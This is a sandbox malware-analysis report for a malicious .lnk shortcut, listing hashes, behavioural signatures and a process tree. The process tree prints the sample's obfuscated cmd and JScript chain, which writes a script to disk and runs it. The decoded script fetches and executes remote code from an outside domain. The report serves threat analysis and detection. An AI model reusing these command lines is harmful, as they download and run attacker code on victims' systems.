Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

1

26586807.lnk

windows7-x64

3

26586807.lnk

windows10-2004-x64

8

Analysis

  • max time kernel
    89s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/01/2024, 19:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    26586807.lnk

  • Size

    1KB

  • MD5

    bc345cb4f475cf31bd47c9bbbeebc376

  • SHA1

    53a989af0ea25a20c022db6d5cda0204dc53d0c5

  • SHA256

    8051b39e71554eb5e1bb9455160957c5a5aae1e24f261052e8e871e93420adfc

  • SHA512

    8e4eca9cdddd877c7db0411a3a809733660db7e8ebc877870a10b901beb97218b6bb586b5499dc14d3df831d9327fd0ab26b5f336a939997cccfc2bb6e4fc3ef

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\26586807.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3900
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT URC=C:\XE9MHO\&& mD !URC!>nul 2>&1&&S^eT HAQR=!URC!^XBLOQECJ.JS&&<nul set/p RDII=var RDII='\u0062\u0071\u0031\u002b\u0044\u0062\u0071\u0031\u002b\u0045\u0062\u0071\u0031\u002b\u0022\u002f\u002f\u0037\u0067\u0062\u0074\u006e\u0061\u0072\u0061\u0069\u0075\u0031\u002e\u0073\u0069\u0063\u006f\u006f\u0070\u0071\u0072\u002e\u006f\u0072\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';URC='\u003a\u0068\u0022\u003b\u0045\u0062\u0071\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XBLO='\u0076\u0061\u0072\u0020\u0043\u0062\u0071\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0062\u0071\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';HAQR=XBLO+URC+RDII;QECJ=new Function(HAQR);QECJ(); >!HAQR!|caLl !HAQR!||caLl !HAQR! "
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4460
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /V/D/c "S^eT URC=C:\XE9MHO\&& mD !URC!>nul 2>&1&&S^eT HAQR=!URC!^XBLOQECJ.JS&&<nul set/p RDII=var RDII='\u0062\u0071\u0031\u002b\u0044\u0062\u0071\u0031\u002b\u0045\u0062\u0071\u0031\u002b\u0022\u002f\u002f\u0037\u0067\u0062\u0074\u006e\u0061\u0072\u0061\u0069\u0075\u0031\u002e\u0073\u0069\u0063\u006f\u006f\u0070\u0071\u0072\u002e\u006f\u0072\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';URC='\u003a\u0068\u0022\u003b\u0045\u0062\u0071\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XBLO='\u0076\u0061\u0072\u0020\u0043\u0062\u0071\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0062\u0071\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';HAQR=XBLO+URC+RDII;QECJ=new Function(HAQR);QECJ(); >!HAQR!|caLl !HAQR!||caLl !HAQR! "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1476
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" caLl C:\XE9MHO\XBLOQECJ.JS"
          4⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:548
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\XE9MHO\XBLOQECJ.JS"
            5⤵
            • Blocklisted process makes network request
            PID:3160
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" set/p RDII=var RDII='\u0062\u0071\u0031\u002b\u0044\u0062\u0071\u0031\u002b\u0045\u0062\u0071\u0031\u002b\u0022\u002f\u002f\u0037\u0067\u0062\u0074\u006e\u0061\u0072\u0061\u0069\u0075\u0031\u002e\u0073\u0069\u0063\u006f\u006f\u0070\u0071\u0072\u002e\u006f\u0072\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';URC='\u003a\u0068\u0022\u003b\u0045\u0062\u0071\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XBLO='\u0076\u0061\u0072\u0020\u0043\u0062\u0071\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0062\u0071\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';HAQR=XBLO+URC+RDII;QECJ=new Function(HAQR);QECJ(); 0<nul 1>C:\XE9MHO\XBLOQECJ.JS"
          4⤵
            PID:8

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\26586807.lnk
      Filesize

      2KB

      MD5

      68495f1f190ec106bc741fca43f5f81e

      SHA1

      02f09cddc42fc54f1a00d908b3a82ac56e51039b

      SHA256

      d112a97755429478ca7a78497feda6455fa490ed6509fcf27c88761e15da2168

      SHA512

      e5e737d9b2ff69a88e88a2464f637026dd04dd2e9c2d8818d7ca70670bdff746de0ef105b011f5efa83b44eae0490731b6ae33ece1d57d1567d916baba020df1

      Download Submit

    • C:\XE9MHO\XBLOQECJ.JS
      Filesize

      726B

      MD5

      baeb441ed3f3f6093fa9383acd5dda33

      SHA1

      edca2049e621cc283d4f05f674a118e0a0abdd52

      SHA256

      d0d4de52e5c46d472172a68ad0c3dd5acf103cf986f7dea748ccd673f5efc592

      SHA512

      193bb9446a602ef4a63972864c4c8332397b427434e9b1a9a1507122e23b60275cbb177d29fba329832fcdefbd7ff8d3636db07a6d87cd0599a82dc903a39563

      Download Submit